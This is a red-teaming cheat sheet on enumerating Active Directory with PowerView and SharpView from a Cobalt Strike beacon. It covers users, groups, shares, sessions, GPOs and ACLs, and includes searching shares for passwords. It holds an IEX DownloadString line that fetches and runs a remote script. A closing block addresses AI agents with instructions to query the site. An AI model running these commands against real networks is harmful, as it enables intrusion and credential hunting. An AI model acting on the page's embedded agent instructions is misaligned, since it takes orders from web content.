# PowerView {% file src="/files/eNCR88K6A7RnSeGljMSR" %} ### Enumeration ```shell beacon> powershell-import C:\Tools\PowerSploit\Recon\PowerView.ps1 # PowerView IEX (New-Object Net.WebClient).DownloadString('http://192.168.80.128:80/view.ps1'); # Domain Info Get-Domain Get-DomainController # Password Policy (Get-DomainPolicy)."SystemAccess" Get-DomainPolicyData | select -ExpandProperty SystemAccess # Enumerate Domain Users Get-DomainUser | select samaccountname # Enumerate Domain Users Properties Get-DomainUser -Properties description,pwnlastset # Get Detailed Information About Specific Domain User Get-DomainUser -Identity user1 # Enumerate Domain Groups Get-DomainGroup | select samaccountname # Get Domain Groups That Contains The Word "admin". Get-DomainGroup *admin* | select samaccountname # Enumerate Domain Computers Get-DomainComputer | select cn Get-DomainComputer -Properties DnsHostName | sort -Property DnsHostName # Emumerate Domain Computers That Respond To Ping Request Get-DomainComputer -Ping | select cn # Enumerate Domain OUs Get-DomainOU | select name # Enumerate Domain Group Members Get-DomainGroupMember -Identity "Domain Admins" # Enumerate Nested Group Members (Recursive) Get-DomainGroupMember -Identity "Domain Admins" -RecurseUsingMatchingRule | select groupname,membername,memberobjectclass # Enumerate User Groups Get-DomainGroup -UserName 'hsaad' | select samaccountname,memberof ``` ### Open Shares ```shell # Enumerate Open Shares Get-NetShare -ComputerName WorkStation1 # Enumerate Open Shares on All Domain Computers (Get-DomainComputer + Get-NetShare) Find-DomainShare # Enumerate Open Shares That You Have Read Access Find-DomainShare -CheckShareAccess # Search on Interesting Files Inside Shares Find-InterestingFile -Path \\workstation1\c$\ # Search on Interesting Keywords Inside Files on Shares findstr /spin /c:"password" \\workstation1\c$\users\administrator\*.txt # Find Interesting Domain Share Files (Get-DomainComputer + Get-NetShare + Find-InterestingFile) Find-InterestingDomainShareFile -Verbose ``` ### Local Groups ```shell # Enumerate Local Groups on Computer WorkStation1 Get-NetLocalGroup –ComputerName WorkStation1 # Enumerate Local Group Members Of Administrators Group on Computer WorkStation1 Get-NetLocalGroupMember -ComputerName WorkStation1 -GroupName "Administrators" # Enumerate Local Group Members Of Remote Desktop Users Group on Computer WorkStation1 Get-NetLocalGroupMember -ComputerName WorkStation1 -GroupName "Remote Desktop Users" # Enumerate Local Group Members on All Domain Computers (Get-DomainComputer + Get-NetLocalGroupMember) Find-DomainLocalGroupMember -GroupName "Administrators" ``` ### Local Admin Access ```shell # Test Admin Access Rights on a Computer Test-AdminAccess -ComputerName workstation1 # Test Admin Access Rights on All Domain Computers (Get-DomainComputer + Test-AdminAccess) Find-LocalAdminAccess -Verbose ``` ### User Hunting ```shell # Enumerate Users Sessions (Reference: https://www.youtube.com/watch?v=q86VgM2Tafc) Get-NetSession -ComputerName WorkStation1 # Enumerate LoggedOn Users Get-NetLoggedon -ComputerName workstation1 # Get Domain Admins + Run Get-NetSession/Get-NetLoggedon on Every Domain Computer + Comparing The Result Find-DomainUserLocation # Perform Against Highly Traffic Servers (Get-DomainFileServer, Get-DomainDFSShare, Get-DomainControlle) Find-DomainUserLocation -Stealth # Run Get-NetSession/Get-NetLoggedon on Every Domain Computer Then Printing All The Result Find-DomainUserLocation -ShowAll # Perform Against Different Users or Groups Find-DomainUserLocation -UserGroupIdentity "local_admin" Find-DomainUserLocation -UserIdentity "ITSupport" ``` ### Domain Group Policy ```shell # Enumerate All Domain Group Policies Get-DomainGPO | select DisplayName Get-DomainGPO -Name "{AD7EE1ED-CDC8-4994-AE0F-50BA8B264829}" -Properties DisplayName # Enumerate All Domain Group Policies Applied To This Computer Get-DomainGPO -ComputerName WorkStation1 # Enumerate Local Admin Access Through Domain Group Policies # Get-DomainGPO + Search For \SecEdit\GptTmpl.inf AND \Preferences\Groups\Groups.xml Get-DomainGPOLocalGroup -Verbose Get-DomainGPOUserLocalGroupMapping -Identity "Jump Users" -LocalGroup "Remote Desktop Users" | select -expand ComputerName ``` ### ACL ```shell # Enumerate All The Domain ACLs For Non BuiltIn Users With Modification Access Find-InterestingDomainAcl -ResolveGUIDs | select ActiveDirectoryRights,ObjectAceType,SecurityIdentifier,ObjectDN ``` ### SharpView ```shell https://github.com/tevora-threat/SharpView beacon> execute-assembly C:\Tools\SharpView\SharpView\bin\Debug\SharpView.exe Get-Domain ``` --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://hsaad.gitbook.io/x/red-teaming/domain-reconnaissance/powerview.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.